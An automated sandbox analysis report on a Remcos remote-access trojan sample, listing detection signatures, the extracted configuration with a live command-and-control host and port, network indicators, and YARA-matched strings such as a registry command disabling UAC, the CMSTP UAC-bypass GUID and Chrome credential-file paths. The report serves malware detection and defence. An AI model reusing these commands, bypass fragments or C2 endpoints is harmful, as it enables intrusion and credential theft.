Windows Analysis Report
C1ZsNxSer8.exe

Overview

General Information

Sample name: C1ZsNxSer8.exe (renamed because the original name is a hash value)
Original sample name: 4fb3e6e7b8f9c12cd2d5e161f7b94760.exe
Analysis ID: 1482895
MD5: 4fb3e6e7b8f9c12cd2d5e161f7b94760
SHA1: 57bdad62c6ea7f1b905c900302f918d185811a94
SHA256: f76f9b85df2ba8850bec058164d2c752c8fd8ef0f1bcffd793e5f453d8a839bb
Tags: 64, exe, trojan

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign process
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • C1ZsNxSer8.exe (PID: 3432 cmdline: "C:\Users\user\Desktop\C1ZsNxSer8.exe" MD5: 4FB3E6E7B8F9C12CD2D5E161F7B94760)
    • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • CasPol.exe (PID: 6780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware configuration (Remcos): {"Host:Port:Password": "unifrieghtmovers.com:2558:1", "Assigned name": "Gasplant", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "chrome-E2SMAR", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  • Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
  • Rule: JoeSecurity_UACBypassusingCMSTP; Description: Yara detected UAC Bypass using CMSTP; Author: Joe Security
  • Rule: Windows_Trojan_Remcos_b296e965; Description: unknown; Author: unknown; Strings:
    • 0x6c4a8:$a1: Remcos restarted by watchdog!
    • 0x6ca20:$a3: %02i:%02i:%02i:%03i
  • Rule: REMCOS_RAT_variants; Description: unknown; Author: unknown; Strings:
    • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
    • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x6656c:$str_b2: Executing file:
    • 0x675ec:$str_b3: GetDirectListeningPort
    • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x67118:$str_b7: \update.vbs
    • 0x66594:$str_b9: Downloaded file:
    • 0x66580:$str_b10: Downloading file:
    • 0x66624:$str_b12: Failed to upload file:
    • 0x675b4:$str_b13: StartForward
    • 0x675d4:$str_b14: StopForward
    • 0x67070:$str_b15: fso.DeleteFile "
    • 0x67004:$str_b16: On Error Resume Next
    • 0x670a0:$str_b17: fso.DeleteFolder "
    • 0x66614:$str_b18: Uploaded file:
    • 0x665d4:$str_b19: Unable to delete:
    • 0x67038:$str_b20: while fso.FileExists("
    • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM; Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003); Author: ditekSHen; Strings:
    • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
    • 0x6637c:$s1: CoGetObject
    • 0x66390:$s1: CoGetObject
    • 0x663ac:$s1: CoGetObject
    • 0x70338:$s1: CoGetObject
    • 0x6633c:$s2: Elevation:Administrator!new:
  (5 of 10 rule matches shown)
Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack
  • Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
  • Rule: JoeSecurity_UACBypassusingCMSTP; Description: Yara detected UAC Bypass using CMSTP; Author: Joe Security
  • Rule: Windows_Trojan_Remcos_b296e965; Description: unknown; Author: unknown; Strings:
    • 0x690a8:$a1: Remcos restarted by watchdog!
    • 0x69620:$a3: %02i:%02i:%02i:%03i
  • Rule: REMCOS_RAT_variants; Description: unknown; Author: unknown; Strings:
    • 0x630fc:$str_a1: C:\Windows\System32\cmd.exe
    • 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x6316c:$str_b2: Executing file:
    • 0x641ec:$str_b3: GetDirectListeningPort
    • 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x63d18:$str_b7: \update.vbs
    • 0x63194:$str_b9: Downloaded file:
    • 0x63180:$str_b10: Downloading file:
    • 0x63224:$str_b12: Failed to upload file:
    • 0x641b4:$str_b13: StartForward
    • 0x641d4:$str_b14: StopForward
    • 0x63c70:$str_b15: fso.DeleteFile "
    • 0x63c04:$str_b16: On Error Resume Next
    • 0x63ca0:$str_b17: fso.DeleteFolder "
    • 0x63214:$str_b18: Uploaded file:
    • 0x631d4:$str_b19: Unable to delete:
    • 0x63c38:$str_b20: while fso.FileExists("
    • 0x636b1:$str_c0: [Firefox StoredLogins not found]
  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM; Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003); Author: ditekSHen; Strings:
    • 0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
    • 0x62f7c:$s1: CoGetObject
    • 0x62f90:$s1: CoGetObject
    • 0x62fac:$s1: CoGetObject
    • 0x6cf38:$s1: CoGetObject
    • 0x62f3c:$s2: Elevation:Administrator!new:
  (5 of 24 rule matches shown)
          No Sigma rule has matched
          No Snort rule has matched
Timestamp: 2024-07-26T10:38:04.959198+0200
SID: 2036594
Source Port: 49701
Destination Port: 2558
Protocol: TCP
Classtype: Malware Command and Control Activity Detected

Timestamp: 2024-07-26T10:39:05.833265+0200
SID: 2022930
Source Port: 443
Destination Port: 49708
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-26T10:38:06.927784+0200
SID: 2803304
Source Port: 49702
Destination Port: 80
Protocol: TCP
Classtype: Unknown Traffic

Timestamp: 2024-07-26T10:38:24.330685+0200
SID: 2022930
Source Port: 443
Destination Port: 49703
Protocol: TCP
Classtype: A Network Trojan was detected

          AV Detection

Source: 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos (same configuration as listed above)
Source: C1ZsNxSer8.exe, ReversingLabs: Detection: 23%
Source: Yara match, File source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: C1ZsNxSer8.exe PID: 3432, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: CasPol.exe PID: 6780, type: MEMORYSTR
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: C1ZsNxSer8.exe, 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_8ee8cf23-d

          Exploits

Source: Yara match, File source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: C1ZsNxSer8.exe PID: 3432, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: CasPol.exe PID: 6780, type: MEMORYSTR

          Privilege Escalation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_004074FD _wcslen,CoGetObject
Source: C1ZsNxSer8.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_0044E879 FindFirstFileExA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_0040783C FindFirstFileW,FindNextFileW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW

          Networking

Source: Malware configuration extractor, URLs: unifrieghtmovers.com
Source: global traffic, TCP traffic: 192.168.2.7:49701 -> 23.95.60.82:2558
Source: global traffic, HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: Joe Sandbox View, IP Address: 178.237.33.50
Source: Joe Sandbox View, IP Address: 23.95.60.82
Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic, HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: global traffic, DNS traffic detected: DNS query: unifrieghtmovers.com
Source: global traffic, DNS traffic detected: DNS query: geoplugin.net
Source: CasPol.exe, CasPol.exe, 00000006.00000002.3738453046.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3738453046.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3738453046.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gp
Source: CasPol.exe, 00000006.00000002.3738453046.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gp-
Source: C1ZsNxSer8.exe, 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gp/C
Source: CasPol.exe, 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: CasPol.exe, 00000006.00000002.3738453046.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gpl
Source: C1ZsNxSer8.exe, String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: C1ZsNxSer8.exe, String found in binary or memory: https://aka.ms/nativeaot-c
Source: C1ZsNxSer8.exe, String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: C1ZsNxSer8.exe, 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: https://aka.ms/nativeaot-compatibilityX
Source: C1ZsNxSer8.exe, String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: C1ZsNxSer8.exe, String found in binary or memory: https://aka.ms/nativeaot-compatibilityy

          Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000 (idHook 0x0D is WH_KEYBOARD_LL, a low-level keyboard hook)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx

          E-Banking Fraud

Source: Yara match, File source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: C1ZsNxSer8.exe PID: 3432, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: CasPol.exe PID: 6780, type: MEMORYSTR

          Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_0041C9E2 SystemParametersInfoW

          System Summary

Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: C1ZsNxSer8.exe PID: 3432, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: CasPol.exe PID: 6780, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Process Stats: CPU usage > 49%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, Code function: 6_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00434E10 appears 54 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00402093 appears 50 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00434770 appears 41 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401E65 appears 34 times
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: String function: 00007FF774A09D50 appears 51 times
          Source: C1ZsNxSer8.exeBinary or memory string: OriginalFilename vs C1ZsNxSer8.exe
          Source: C1ZsNxSer8.exe, 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGetHRForExceptionRoundToNegativeInfinityScalar.dll~/ vs C1ZsNxSer8.exe
          Source: C1ZsNxSer8.exe, 00000001.00000002.1270156855.00000145BEC00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGetHRForExceptionRoundToNegativeInfinityScalar.dll~/ vs C1ZsNxSer8.exe
          Source: C1ZsNxSer8.exeBinary or memory string: OriginalFilenameGetHRForExceptionRoundToNegativeInfinityScalar.dll~/ vs C1ZsNxSer8.exe
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
